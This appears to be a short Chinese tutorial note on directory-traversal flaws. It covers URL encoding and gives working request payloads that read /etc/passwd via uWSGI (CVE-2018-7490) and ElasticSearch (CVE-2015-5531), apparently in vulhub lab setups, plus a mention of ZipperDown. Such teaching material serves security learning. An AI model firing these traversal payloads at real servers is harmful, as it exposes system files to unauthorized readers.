基础知识

目录穿越简单理解就是对于../没有做严格限制,攻击者可以通过../访问敏感信息。

URL编码和ASCII字符

%2F /

%20 空格

%3F ?

命令行下,curl 发送URL请求

Burpsuite Repeater模块发送各种请求Payload

实例

uWSGI PHP目录穿越漏洞 (CVE-2018-7490)

影响版本:2.0.17之前

uWSGI是一款Web应用程序服务器,在2.0.17之前没有正确处理DOCUMENT_ROOT导致用户可以利用../来跨域目录,读取DOCUMENT_ROOT目录以外的文件。

直接浏览器访问:

1
http://your-ip:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd

ElasticSearch 目录穿越漏洞(CVE-2015-5531)

http://vulhub.org/#/environments/elasticsearch/CVE-2015-5531/

https://www.exploit-db.com/exploits/38383/

影响版本:v1.6.1以下

ElasticSearch是一个基于分布式多用户能力的全文搜索引擎,基于Restful web接口。支持通过HTTP使用JSON进行数据索引。

1
curl http://your-ip:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

ZipperDown IOS目录穿越

最近几天比较火的漏洞,算是ZipArchive包没限制../的一个问题吧。目前还没看到POC,持续关注中。。。